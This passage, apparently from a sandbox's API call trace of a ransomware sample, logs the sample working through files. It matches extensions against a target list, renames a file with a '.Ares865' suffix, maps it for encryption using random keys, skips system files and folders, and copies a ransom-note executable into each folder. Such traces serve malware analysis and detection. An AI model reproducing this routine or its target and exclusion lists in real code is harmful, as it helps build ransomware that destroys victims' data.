lpString2="nsf") returned -1 [0085.897] lstrlenW (lpString="nv") returned 2 [0085.897] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0085.897] lstrlenW (lpString="nv2") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0085.898] lstrlenW (lpString="nwdb") returned 4 [0085.898] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0085.898] lstrlenW (lpString="nyf") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0085.898] lstrlenW (lpString="odb") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.898] lstrlenW (lpString="odb") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.898] lstrlenW (lpString="oqy") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0085.898] lstrlenW (lpString="ora") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0085.898] lstrlenW (lpString="orx") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0085.898] lstrlenW (lpString="owc") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0085.898] lstrlenW (lpString="p96") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0085.898] lstrlenW (lpString="p97") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0085.898] lstrlenW (lpString="pan") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0085.898] lstrlenW (lpString="pdb") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0085.898] lstrlenW (lpString="pdm") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0085.898] lstrlenW (lpString="pnz") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0085.898] lstrlenW (lpString="qry") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0085.898] lstrlenW (lpString="qvd") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0085.898] lstrlenW (lpString="rbf") returned 3 [0085.898] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0085.898] lstrlenW (lpString="rctd") returned 4 [0085.898] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0085.898] lstrlenW (lpString="rod") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0085.899] lstrlenW (lpString="rodx") returned 4 [0085.899] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0085.899] lstrlenW (lpString="rpd") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0085.899] lstrlenW (lpString="rsd") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0085.899] lstrlenW (lpString="sas7bdat") returned 8 [0085.899] lstrcmpiW (lpString1="Site.ico", lpString2="sas7bdat") returned 1 [0085.899] lstrlenW (lpString="sbf") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0085.899] lstrlenW (lpString="scx") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0085.899] lstrlenW (lpString="sdb") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0085.899] lstrlenW (lpString="sdc") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0085.899] lstrlenW (lpString="sdf") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0085.899] lstrlenW (lpString="sis") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0085.899] lstrlenW (lpString="spq") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0085.899] lstrlenW (lpString="te") returned 2 [0085.899] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0085.899] lstrlenW (lpString="teacher") returned 7 [0085.899] lstrcmpiW (lpString1="ite.ico", lpString2="teacher") returned -1 [0085.899] lstrlenW (lpString="tmd") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0085.899] lstrlenW (lpString="tps") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0085.899] lstrlenW (lpString="trc") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.899] lstrlenW (lpString="trc") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.899] lstrlenW (lpString="trm") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0085.899] lstrlenW (lpString="udb") returned 3 [0085.899] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0085.900] lstrlenW (lpString="udl") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0085.900] lstrlenW (lpString="usr") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0085.900] lstrlenW (lpString="v12") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0085.900] lstrlenW (lpString="vis") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0085.900] lstrlenW (lpString="vpd") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0085.900] lstrlenW (lpString="vvv") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0085.900] lstrlenW (lpString="wdb") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0085.900] lstrlenW (lpString="wmdb") returned 4 [0085.900] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0085.900] lstrlenW (lpString="wrk") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0085.900] lstrlenW (lpString="xdb") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0085.900] lstrlenW (lpString="xld") returned 3 [0085.900] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0085.900] lstrlenW (lpString="xmlff") returned 5 [0085.900] lstrcmpiW (lpString1="e.ico", lpString2="xmlff") returned -1 [0085.900] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.Ares865") returned 66 [0085.900] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico.ares865"), dwFlags=0x1) returned 1 [0085.902] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\sharepointteamsite.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.902] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25214) returned 1 [0085.902] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.902] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.902] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.902] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.903] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.903] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.903] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6580, lpName=0x0) returned 0x15c [0085.905] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6580) returned 0x190000 [0085.907] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.907] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.907] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.908] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.908] CloseHandle (hObject=0x15c) returned 1 [0085.908] CloseHandle (hObject=0x118) returned 1 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.909] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="aoldtz.exe") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2=".") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="..") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="windows") returned -1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="bootmgr") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="temp") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="pagefile.sys") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="boot") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="ids.txt") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="ntuser.dat") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="perflogs") returned 1 [0085.909] lstrcmpiW (lpString1="UICaptions", lpString2="MSBuild") returned 1 [0085.909] lstrlenW (lpString="UICaptions") returned 10 [0085.909] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0085.909] lstrcpyW (in: lpString1=0x2cce448, lpString2="UICaptions" | out: lpString1="UICaptions") returned="UICaptions" [0085.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0085.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0085.909] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0085.909] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 0 [0085.909] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.909] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0085.909] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions") returned="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions" [0085.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0085.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0085.910] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions") returned 46 [0085.910] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions" | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions") returned="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions" [0085.910] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.910] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.910] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.910] GetLastError () returned 0x0 [0085.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.911] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.911] CloseHandle (hObject=0x120) returned 1 [0085.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.911] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.911] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.911] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.911] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.911] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.911] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.911] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.911] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.911] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.911] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.911] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="aoldtz.exe") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="bootmgr") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="temp") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="pagefile.sys") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="boot") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="ids.txt") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="ntuser.dat") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="perflogs") returned -1 [0085.911] lstrcmpiW (lpString1="1036", lpString2="MSBuild") returned -1 [0085.912] lstrlenW (lpString="1036") returned 4 [0085.912] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\*") returned 48 [0085.912] lstrcpyW (in: lpString1=0x2cce45e, lpString2="1036" | out: lpString1="1036") returned="1036" [0085.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0085.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4710 [0085.912] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0085.912] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="aoldtz.exe") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2=".") returned 1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="..") returned 1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="windows") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="bootmgr") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="temp") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="pagefile.sys") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="boot") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="ids.txt") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="ntuser.dat") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="perflogs") returned -1 [0085.912] lstrcmpiW (lpString1="3082", lpString2="MSBuild") returned -1 [0085.912] lstrlenW (lpString="3082") returned 4 [0085.912] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036") returned 51 [0085.912] lstrcpyW (in: lpString1=0x2cce45e, lpString2="3082" | out: lpString1="3082") returned="3082" [0085.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0085.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4780 [0085.912] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0085.912] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c5e97a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.912] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.912] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c5e97a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0085.912] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.912] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0085.912] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082" [0085.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0085.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0085.912] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082") returned 51 [0085.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082" | out: lpString1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082" [0085.913] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.913] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.913] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.913] GetLastError () returned 0x0 [0085.913] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.913] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.913] CloseHandle (hObject=0x120) returned 1 [0085.914] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.914] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.914] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.914] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.914] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.914] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.914] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.914] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.914] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.914] lstrcmpiW 